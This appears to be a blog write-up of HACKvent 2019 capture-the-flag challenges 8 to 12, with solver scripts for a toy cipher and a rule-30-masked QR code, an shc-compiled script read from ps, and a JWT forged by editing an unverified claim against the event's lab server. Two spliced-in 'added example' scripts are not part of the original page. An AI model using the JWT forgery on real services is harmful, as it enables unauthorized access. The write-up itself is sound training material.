&#8220;Encryption&#8221;-method and try to decrypt the flag.<\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a mysql dump:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/08# unzip c635204a-6347-45d7-91f8-bd7b94b111f1.zip\nArchive:  c635204a-6347-45d7-91f8-bd7b94b111f1.zip\n  inflating: dump.sql\nroot@kali:~\/hv19\/08# file dump.sql\ndump.sql: ASCII text, with CRLF line terminators\nroot@kali:~\/hv19\/08# cat dump.sql\n-- MySQL dump 10.13  Distrib 5.7.19, for Win64 (x86_64)\n...\n\nCREATE TABLE `creditcards` (\n  `cc_id` int(11) NOT NULL AUTO_INCREMENT,\n  `cc_owner` varchar(64) DEFAULT NULL,\n  `cc_number` varchar(32) DEFAULT NULL,\n  `cc_expires` varchar(7) DEFAULT NULL,\n  PRIMARY KEY (`cc_id`)\n) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n...\n\nINSERT INTO `creditcards` VALUES\n(1,'Sirius Black',':)QVXSZUVY\\ZYYZ[a','12\/2020'),\n(2,'Hermione Granger',':)QOUW[VT^VY]bZ_','04\/2021'),\n(3,'Draco Malfoy',':)SPPVSSYVV\\YY_\\\\]','05\/2020'),\n(4,'Severus 
Snape',':)RPQRSTUVWXYZ[\\]^','10\/2020'),\n(5,'Ron Weasley',':)QTVWRSVUXW[_Z`\\b','11\/2020');\n\n...\n\nCREATE TABLE `flags` (\n  `flag_id` int(11) NOT NULL AUTO_INCREMENT,\n  `flag_prefix` varchar(5) NOT NULL,\n  `flag_content` varchar(29) NOT NULL,\n  `flag_suffix` varchar(1) NOT NULL,\n  PRIMARY KEY (`flag_id`)\n) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n...\n\nINSERT INTO `flags` VALUES (1,'HV19{',':)SlQRUPXWVo\\Vuv_n_\\ajjce','}');\n\n...\n<\/pre>\n<br\/>The <i>encrypted<\/i> data begins with a smiley (<code>:)<\/code>) followed by upper case letters, which towards the end of the data turn into special characters and lower case letters.\n<br\/>\n<br\/>This observation is essential. Assuming a one-to-one mapping from each byte of the <i>encrypted<\/i> data to an ASCII digit of the credit card number, there must be some kind of shift that grows with each byte, because the byte values get bigger and bigger towards the end of the data.\n<br\/>\n<br\/>For the first byte of the credit card data there are three different values: <code>Q (0x51)<\/code>, <code>R (0x52)<\/code> and <code>S (0x53)<\/code>. Assuming that these must be mapped to a digit from <code>0 (0x30)<\/code> to <code>9 (0x39)<\/code>, the offset must be between <code>0x53 - 0x39 = 26<\/code> and <code>0x51 - 0x30 = 33<\/code>.\n<br\/>\n<br\/>Because of the observed shift, we increase the offset by one for each subsequent byte. 
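Instead of eyeballing all eight candidate offsets, the five card numbers in the dump can select the offset for us: a genuine card number decrypts to digits only and passes the Luhn mod-10 check. This is an added example, not the author's script; the ciphertexts are copied from the dump without the leading smiley, and `smile_decrypt`, `luhn_ok`, `score_offset` and `recover` are my names.

```python
# Added example, not the author's script: let the five card numbers in the dump
# choose the offset. A real card number decrypts to digits only and passes the
# Luhn check; the offset that satisfies all five is then applied to the flag.
# Ciphertexts are copied from dump.sql with the leading ':)' removed.
CARDS = [
    'QVXSZUVY\\ZYYZ[a',      # Sirius Black
    'QOUW[VT^VY]bZ_',        # Hermione Granger
    'SPPVSSYVV\\YY_\\\\]',   # Draco Malfoy
    'RPQRSTUVWXYZ[\\]^',     # Severus Snape
    'QTVWRSVUXW[_Z`\\b',     # Ron Weasley
]
FLAG_BODY = 'SlQRUPXWVo\\Vuv_n_\\ajjce'   # the part between 'HV19{' and '}'


def smile_decrypt(ct, offset):
    '''Byte i was shifted up by offset + i, so shift it back down.'''
    return ''.join(chr(ord(c) - (offset + i)) for i, c in enumerate(ct))


def luhn_ok(number):
    '''Mod-10 check: from the right, double every second digit (9 -> 18 -> 9).'''
    if not number.isdigit():
        return False
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def score_offset(offset, cards=CARDS):
    '''How many of the card ciphertexts decrypt to a Luhn-valid number.'''
    return sum(luhn_ok(smile_decrypt(c, offset)) for c in cards)


def recover(lo=26, hi=33):
    '''Pick the offset in [lo, hi] with the most valid cards; decrypt the flag.'''
    best = max(range(lo, hi + 1), key=score_offset)
    return best, score_offset(best), smile_decrypt(FLAG_BODY, best)


if __name__ == '__main__':
    offset, valid, flag = recover()
    print(offset, valid, 'HV19{' + flag + '}')
```

Only one offset makes all five numbers Luhn-valid; every other candidate leaves at least one ciphertext decrypting to a non-digit.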
After trying out the different offsets beginning from <code>26<\/code>, we obviously get a hit at <code>30<\/code> using the following python script:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\ncc1  = 'QVXSZUVY\\\\ZYYZ[a'\ncc2  = 'QOUW[VT^VY]bZ_'\ncc3  = 'SPPVSSYVV\\\\YY_\\\\\\\\]'\ncc4  = 'RPQRSTUVWXYZ[\\\\]^'\ncc5  = 'QTVWRSVUXW[_Z`\\\\b'\nflag = 'SlQRUPXWVo\\\\Vuv_n_\\\\ajjce'\n\nenc = [cc1,cc2,cc3,cc4,cc5,flag]\nfor x in range(26,34):\n  print('offset = ' + str(x))\n  for e in enc:\n    dec = ''\n    for i in range(len(e)):\n      c = e[i]\n      dec += chr(ord(c)-(x+i))\n    print(dec)\n  print('')<\/pre>\n<br\/>Running the script:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/08# .\/crack.py\noffset = 26\n7;&lt;6&lt;668:754449\n749:=74=469=48\n9549549549549544\n8555555555555555\n79::4464647:4949\n9Q5571864L81OO7E515=&lt;45\n\noffset = 27\n6:;5;5579643338\n6389&lt;63&lt;358&lt;37\n8438438438438433\n7444444444444444\n6899335353693838\n8P4460753K70NN6D404&lt;;34\n\noffset = 28\n59:4:4468532227\n5278;52;247;26\n7327327327327322\n6333333333333333\n5788224242582727\n7O335\/642J6\/MM5C3\/3;:23\n\noffset = 29\n489393357421116\n4167:41:136:15\n6216216216216211\n5222222222222222\n4677113131471616\n6N224.531I5.LL4B2.2:912\n\noffset = 30\n378282246310005\n30569309025904\n5105105105105100\n4111111111111111\n3566002020360505\n5M113-420H4-KK3A1-19801\n\noffset = 31\n26717113520\/\/\/4\n2\/4582\/8\/148\/3\n40\/40\/40\/40\/40\/\/\n3000000000000000\n2455\/\/1\/1\/25\/4\/4\n4L002,31\/G3,JJ2@0,087\/0\n\noffset = 32\n1560600241\/...3\n1.3471.7.037.2\n3\/.3\/.3\/.3\/.3\/..\n2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n1344..0.0.14.3.3\n3K\/\/1+20.F2+II1?\/+\/76.\/\n\noffset = 
33\n045\/5\/\/130.---2\n0-2360-6-\/26-1\n2.-2.-2.-2.-2.--\n1...............\n0233--\/-\/-03-2-2\n2J..0*1\/-E1*HH0&gt;.*.65-.<\/pre>As we can clearly see, only the offset <code>30<\/code> results in 5 valid credit card numbers as well as the flag.\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{5M113-420H4-KK3A1-19801}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.09\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.09 &#8211; Santas&nbsp;Quick&nbsp;Response&nbsp;3.0<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_09.png\" \/><\/td><td style=\"color:#333333\">Author: brp64 feat. M.<\/td><\/tr><tr><td colspan=\"2\">Visiting the following railway station has left lasting memories.\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_01_wall.jpg\" \/>\n<br\/>\n<br\/>Santa&#8217;s brand new gifts distribution system is heavily inspired by it. Here is your personal gift, can you extract the destination path of it?\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_02_qrcode.png\" \/>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The first insight can be gained by using Google&#8217;s image search on the first image, which leads to the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Rule_30\" rel=\"noopener noreferrer\" target=\"_blank\">Wikipedia article on rule 30<\/a>.\n<br\/>\n<br\/>The second major observation concerns the second image, the obviously invalid QR code. Although the major part of the QR code seems to be messed up, the squares in the upper left and upper right corner seem to be untouched. 
Combining this with the layout of the evolution diagram of rule 30 &#8230;\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_03_rule30.png\" width=\"400px\"\/>\n<br\/>\n<br\/>&#8230; raises the question if the QR code might be transformed using the rule 30 pyramid.\n<br\/>\n<br\/>Initially I wrote a python script, which reads the invalid QR code into a two dimensional array (for further processing) and prints it as ASCII:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/09# cat qrcode.py\n#!\/usr\/bin\/env python\n\nfrom PIL import Image\nimport sys\n\ndef printQR(qr):\n  for i in range(len(qr)):\n    for j in range(len(qr[i])):\n      if (qr[i][j] == 1): sys.stdout.write('X')\n      else: sys.stdout.write(' ')\n    print('')\n\ndef readImage(filename):\n  data = []\n  im = Image.open(filename)\n  pix = im.load()\n  for h in range(2, im.size[0], 5):\n    data.append([])\n    for w in range(2, im.size[1], 5):\n      p = pix[w,h]\n      if (p == 0 or p == (0,255)): data[len(data)-1].append(1)\n      else: data[len(data)-1].append(0)\n  return data\n\nqrcode = readImage('bd659aba-5ad2-4ad3-992c-6f99023792bc.png')\nprintQR(qrcode)<\/pre>\n<br\/>Running the script outputs the QR code as ASCII:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/09# .\/qrcode.py \nXXXXXXX   X  X XX   XXX   XXXXXXX\nX     X XX  XX XXXXX  X X X     X\nX XXX X XX X XXX XXXXX  X X XXX X\nX XXX X XX   X X X XXXX   X XXX X\nX XXX X XXXX X     XX  X  X XXX X\nX     X XXXX  XXXX  XX X  X     X\nXXXXXXX X XX  XXX X   XXX XXXXXXX\n         XXXXX XX X  XX          \n  X  XXXX   X X   X     X  XXXXX \n  XXXX XX X XXX X X   XX       XX\nX X X XX   X X X X XX X XXXXXXX X\n X    XX  X X     X X XXX  XXX   \n    XX  X   X  X    XX  XXX XX XX\n XXX    XX X X X X  
   XX X XXX  \n   XX X   X  XX     XXX XXX   XXX\n XX   X X  X    X X XXXX XXXXXX X\n  X   X    X  XX  X      X X  XX \nXXXX  X XX  X X  X X   X XX   X X\nX X  XXXXXX XX  XX X  X  XX  XXXX\nX  X   XX  X X     XXX X XXX  XXX\n X XX   X XXXXX XXX  X  XXXXXXX  \nXXX X   X XX  XX  XXXX  X  XXXXX \nXXX X    XX XXXX X XXX  X  X X X \nX X  XXXX  XXXXX X X X X X XXXXXX\nX  XXX  XX X  XX  X  XXX X    X X\nXX  XXX X XX X X   X   X  X X  X \n X   XXXXX    XXX XX X XX  XXX   \n  X  X XXXX XXX X    X   XX  XX  \nX    XX   X   XXX X   X XXXX XXXX\n X XX   XX XX XX  X XX   X   X  X\n  X XX     XX  X X    X  XX XXXXX\nXXXX XX XXX   X  XXX  XXXXX    X \n  XXX  XXX    XX    XX XX  X XX X<\/pre>\n<br\/>If we assume that the QR code was XORed with the rule 30 pyramid, we can take the 7th line as a reference, because it contains the timing pattern (<code>X-X-X-X...<\/code>). XORing the current 7th line with the line as it should actually be within a valid QR code should result in a line of the rule 30 pyramid, if your assumption is correct:\n<br\/>\n<br\/><pre>\n<br\/>XXXXXXX X XX  XXX X   XXX XXXXXXX  <-- 7th line invalid QR code\n<br\/>XXXXXXX X X X X X X X X X XXXXXXX  <-- 7th line in a valid QR code\n<br\/>---------------------------------\n<br\/>           XX  X    X  X           <-- XOR result (line of rule 30?)\n<br\/><\/pre>\n<br\/>We can actually confirm that the result is a line of the rule 30 pyramid. 
Even more convincing is the fact that it is also the 7th line of the pyramid:\n<br\/>\n<br\/><pre>\n<br\/>                 X               \n<br\/>                XXX              \n<br\/>               XX  X             \n<br\/>              XX XXXX            \n<br\/>             XX  X   X           \n<br\/>            XX XXXX XXX          \n<br\/>           XX  X    X  X         <-- 7th line\n<br\/>          XX XXXX  XXXXXX        \n<br\/>         XX  X   XXX     X       \n<br\/>        XX XXXX XX  X   XXX      \n<br\/>       XX  X    X XXXX XX  X     \n<br\/>      XX XXXX  XX X    X XXXX    \n<br\/>     XX  X   XXX  XX  XX X   X   \n<br\/><\/pre>\n<br\/>In order to XOR the invalid QR code with the rule 30 pyramid, we can scale and position the image of the rule 30 pyramid from above (it is not supposed to be centered) and save it as an image with the same size as the QR code image. This way, the python script can be reused to read the image data into a two dimensional array:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_04_rule30_scaled.png\" \/>\n<br\/>\n<br\/>Finally, we add functions which XOR both arrays and save an array back to an image file. 
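Before the author's full script, an added example that is not from the write-up: it generates the rule 30 pyramid in code rather than from a scaled image and XORs it with the ASCII dump of the damaged QR code. It assumes the seed cell at column 17 of the 33-wide grid (one to the right of centre), which is where the 7th-line check above places it; the `DAMAGED` rows are copied from the `qrcode.py` output, and `rule30_grid`, `to_grid`, `xor_grids` and `repair` are my names.

```python
# Added example, not the author's script: build the rule 30 pyramid in code
# instead of scaling an image, then XOR it with the ASCII dump of the damaged
# QR code. The single seed cell is placed in column 17 of the 33-wide grid
# (one to the right of centre), which is where the 7th-line check puts it.
SIZE = 33
SEED_COL = 17

# the 33 rows printed by qrcode.py in the write-up
DAMAGED = [
    'XXXXXXX   X  X XX   XXX   XXXXXXX',
    'X     X XX  XX XXXXX  X X X     X',
    'X XXX X XX X XXX XXXXX  X X XXX X',
    'X XXX X XX   X X X XXXX   X XXX X',
    'X XXX X XXXX X     XX  X  X XXX X',
    'X     X XXXX  XXXX  XX X  X     X',
    'XXXXXXX X XX  XXX X   XXX XXXXXXX',
    '         XXXXX XX X  XX          ',
    '  X  XXXX   X X   X     X  XXXXX ',
    '  XXXX XX X XXX X X   XX       XX',
    'X X X XX   X X X X XX X XXXXXXX X',
    ' X    XX  X X     X X XXX  XXX   ',
    '    XX  X   X  X    XX  XXX XX XX',
    ' XXX    XX X X X X     XX X XXX  ',
    '   XX X   X  XX     XXX XXX   XXX',
    ' XX   X X  X    X X XXXX XXXXXX X',
    '  X   X    X  XX  X      X X  XX ',
    'XXXX  X XX  X X  X X   X XX   X X',
    'X X  XXXXXX XX  XX X  X  XX  XXXX',
    'X  X   XX  X X     XXX X XXX  XXX',
    ' X XX   X XXXXX XXX  X  XXXXXXX  ',
    'XXX X   X XX  XX  XXXX  X  XXXXX ',
    'XXX X    XX XXXX X XXX  X  X X X ',
    'X X  XXXX  XXXXX X X X X X XXXXXX',
    'X  XXX  XX X  XX  X  XXX X    X X',
    'XX  XXX X XX X X   X   X  X X  X ',
    ' X   XXXXX    XXX XX X XX  XXX   ',
    '  X  X XXXX XXX X    X   XX  XX  ',
    'X    XX   X   XXX X   X XXXX XXXX',
    ' X XX   XX XX XX  X XX   X   X  X',
    '  X XX     XX  X X    X  XX XXXXX',
    'XXXX XX XXX   X  XXX  XXXXX    X ',
    '  XXX  XXX    XX    XX XX  X XX X',
]


def rule30_grid(size=SIZE, seed_col=SEED_COL):
    '''Rows 0..size-1 of rule 30 from one live cell, cropped to size columns.
    The automaton runs on a strip padded on both sides, so the crop never
    sees boundary effects.'''
    pad = size
    width = size + 2 * pad
    row = [0] * width
    row[pad + seed_col] = 1
    grid = []
    for _ in range(size):
        grid.append(row[pad:pad + size])
        nxt = [0] * width
        for i in range(1, width - 1):
            # rule 30: new cell = left XOR (centre OR right)
            nxt[i] = row[i - 1] ^ (row[i] | row[i + 1])
        row = nxt
    return grid


def to_grid(lines, size=SIZE):
    '''ASCII rows ('X' = dark module) to a 0/1 matrix; tolerates lost trailing spaces.'''
    return [[1 if c == 'X' else 0 for c in line.ljust(size)[:size]] for line in lines]


def to_lines(grid):
    return [''.join('X' if v else ' ' for v in row) for row in grid]


def xor_grids(a, b):
    return [[x ^ y for x, y in zip(ra, rb)] for ra, rb in zip(a, b)]


def repair(damaged=DAMAGED):
    '''XOR the damaged code with the pyramid; returns the corrected ASCII rows.'''
    return to_lines(xor_grids(to_grid(damaged), rule30_grid(len(damaged))))


if __name__ == '__main__':
    for line in repair():
        print(line)
```

A quick sanity check on the result, short of scanning it: the 7th row becomes the timing pattern `XXXXXXX X X X X X X X X X XXXXXXX`, the top finder patterns are untouched, and the vertical timing pattern in column 7 alternates below the top-left finder.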
The full script looks like this:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom PIL import Image\nimport sys\n\n\ndef printQR(qr):\n  for i in range(len(qr)):\n    for j in range(len(qr[i])):\n      if (qr[i][j] == 1): sys.stdout.write('X')\n      else: sys.stdout.write(' ')\n    print('')\n\n\ndef readImage(filename):\n  data = []\n  im = Image.open(filename)\n  pix = im.load()\n  for h in range(2, im.size[0], 5):\n    data.append([])\n    for w in range(2, im.size[1], 5):\n      p = pix[w,h]\n      if (p == 0 or p == (0,255)): data[len(data)-1].append(1)\n      else: data[len(data)-1].append(0)\n  return data\n\n\ndef saveQR(qr, filename):\n  im = Image.new('RGB', (39,39))\n  arr = []\n  arr += [(255,255,255)]*39*3\n  for i in range(len(qr)):\n    arr += [(255,255,255)]*3\n    for j in range(len(qr[i])):\n      if (qr[i][j] == 1): arr += [(0,0,0)]\n      else: arr += [(255,255,255)]\n    arr += [(255,255,255)]*3\n  arr += [(255,255,255)]*39*3\n  im.putdata(arr)\n  im.save(filename)\n\ndef xorImages(img1, img2):\n  data = []\n  for i in range(len(img1)):\n    data.append([])\n    for j in range(len(img1[i])):\n      data[i].append(img1[i][j] ^ img2[i][j])\n  return data\n\n\nqrcode = readImage('bd659aba-5ad2-4ad3-992c-6f99023792bc.png')\nrule30 = readImage('rule30.png')\nfinal = xorImages(qrcode, rule30)\nprintQR(final)\nsaveQR(final, 'out.png')<\/pre>\n<br\/>After running the script, the resulting QR code is stored in <code>out.png<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_05_final.png\" \/>\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/09# zbarimg out.png \nQR-Code:HV19{Cha0tic_yet-0rdered}\nscanned 1 barcode symbols from 1 images in 0.02 seconds<\/pre>\n<br\/>The flag is <span 
class=\"spanFlag\">HV19{Cha0tic_yet-0rdered}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.10\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.10 &#8211; Guess&nbsp;what<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_10.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">The flag is right, of course\n<br\/>\n<br\/><span class=\"link\">HV19.10-guess3.zip<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>After two broken binaries were uploaded, the final binary (contained in <code>HV19.10-guess3.zip<\/code>) worked well.\n<br\/>\n<br\/>The binary is a dynamically linked, stripped 64-bit ELF file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/10# unzip d658ab66-6859-416d-8554-9a4ee0105794.zip \nArchive:  d658ab66-6859-416d-8554-9a4ee0105794.zip\n  inflating: guess3                  \nroot@kali:~\/hv19\/10# file guess3 \nguess3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=5e1e9f74990e4f8f96d380d2b5264a3567a9d046, stripped<\/pre>\n<br\/>During my initial research before the final binary was uploaded, I stumbled upon <a href=\"https:\/\/github.com\/neurobin\/shc\" rel=\"noopener noreferrer\" target=\"_blank\">shc<\/a>, which was obviously used to create the binaries. 
shc basically converts a shell script to an ELF binary.\n<br\/>\n<br\/>When we run the binary, we are prompted for an input:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/10# .\/guess3\nYour input: <\/pre>\n<br\/>If we now simply inspect the output of <code>ps<\/code>, we can see the original shell script, which contains the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~# ps aux | grep guess3\nroot      5881  0.0  0.0   6584  2848 pts\/1    S+   08:28   0:00 .\/guess3 -c                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  #!\/bin\/bash  read -p \"Your input: \" input  if [ $input = \"HV19{Sh3ll_0bfuscat10n_1s_fut1l3}\" ]  then   echo \"success\" else    echo \"nooooh. try harder!\" fi   .\/guess3\nroot      6046  0.0  0.0   6136   888 pts\/2    S+   08:29   0:00 grep guess3<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Sh3ll_0bfuscat10n_1s_fut1l3}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.11\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.11 &#8211; Frolicsome&nbsp;Santa&nbsp;Jokes&nbsp;API<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_11.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">The elves created an API where you get random jokes about santa.\n<br\/>\n<br\/>Go and try it here: <span class=\"link\">http:\/\/whale.hacking-lab.com:10101<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided link leads to the <code>FSJA API<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/11_01_api.png\" width=\"900px\"\/>\n<br\/>\n<br\/>According to the description, 
let&#8217;s start by creating a user:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/11# curl -s -X POST -H 'Content-Type: application\/json' http:\/\/whale.hacking-lab.com:10101\/fsja\/register --data '{\"username\":\"scryh\", \"password\": \"giveflagplx\"}'\n{\"message\":\"User created\",\"code\":201}\n<\/pre>\n<br\/>Now we can retrieve our token:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/11# curl -s -X POST -H 'Content-Type: application\/json' http:\/\/whale.hacking-lab.com:10101\/fsja\/login --data '{\"username\":\"scryh\", \"password\": \"epixplzplz\"}'\n{\"message\":\"Token generated\",\"code\":201,\"token\":\"eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuYW1lIjoic2NyeWgiLCJwbGF0aW51bSI6ZmFsc2V9LCJleHA\niOjE1NzYwNTQ1NTUuOTU3MDAwMDAwfQ.CPgXKYMPSEKIib8du1Mfr9jd_Eqo5qNxLEn3qEgAsFM\"}<\/pre>\n<br\/>Using this token, we can get a random santa joke:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/11# curl -X GET \"http:\/\/whale.hacking-lab.com:10101\/fsja\/random?token=eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuY...\"\n{\"joke\":\"This past Christmas, I told my girlfriend for months in advance that all I wanted was an Xbox. That\u2019s it. Beginning and end of list, Xbox. You know what she got me? A homemade frame with a picture of us from our first date together. Which was fine. 
Because I got her an Xbox.\",\"author\":\"Anthony Jeselnik\",\"platinum\":false}\n<\/pre>\n<br\/>Let&#8217;s have a look at the token, which is a <code>JSON Web Token<\/code> and can be parsed nicely on <a href=\"https:\/\/jwt.io\/\" rel=\"noopener noreferrer\" target=\"_blank\">jwt.io<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/11_02_jwt.png\" width=\"800px\"\/>\n<br\/>\n<br\/>As we have already seen in the joke output, there is an attribute called <code>platinum<\/code>, which is currently set to <code>false<\/code>.\n<br\/>\n<br\/>At first I started <a href=\"https:\/\/github.com\/lmammino\/jwt-cracker\" rel=\"noopener noreferrer\" target=\"_blank\">jwt-cracker<\/a> in the background, which could potentially crack the secret used to sign the token.\n<br\/>\n<br\/>Though it turned out to be even easier. It suffices to set the attribute from <code>false<\/code> to <code>true<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/11_03_jwt2.png\" width=\"600px\"\/>\n<br\/>\n<br\/>If we now request a joke using the new token, we get the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~# curl -X GET \"http:\/\/whale.hacking-lab.com:10101\/fsja\/random?token=eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuYW1lIjoic2NyeWgiLCJwbGF0aW51bSI6dHJ1ZX0sImV4cCI6MTU3NjA1NDU1NS45NTd9.24NlMDst57dLNgA0iOAiDOPOMwIoqHGAqp23i-F2vME\"\n{\"joke\":\"Congratulation! Sometimes bugs are rather stupid. But that's how it happens, sometimes. Doing all the crypto stuff right and forgetting the trivial stuff like input validation, Hohoho! Here's your flag: HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}\",\"author\":\"Santa\",\"platinum\":true}\n<\/pre>\n<br\/>The signature is not verified at all. 
This means that we can even totally omit the signature.\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.12\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.12 &#8211; back&nbsp;to&nbsp;basic<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_12.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa used his time machine to get a present from the past. get your rusty tools out of your cellar and solve this one!\n<br\/>\n<br\/><span class=\"link\">HV19.12-BackToBasic.zip<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a 32-bit PE binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/12# unzip 67e6c6c2-1119-4c1e-a9b5-85f118173a40.zip \nArchive:  67e6c6c2-1119-4c1e-a9b5-85f118173a40.zip\n  inflating: BackToBasic.exe         \nroot@kali:~\/hv19\/12# file BackToBasic.exe \nBackToBasic.exe: PE32 executable (GUI) Intel 80386, for MS Windows<\/pre>\n<br\/>Running <code>strings<\/code> on the file outputs several <code>__vba<\/code> function names, which suggests that the binary was built with <code>Visual Basic<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/12# strings BackToBasic.exe \n!This program cannot be run in DOS mode.\nRich\n.text\n`.data\n.rsrc\nMSVBVM60.DLL\njRs1hRs\n...\nHACKvent2019\nProject1\nForm1\nProject1\nForm\nC:\\Program Files\\Microsoft Visual 
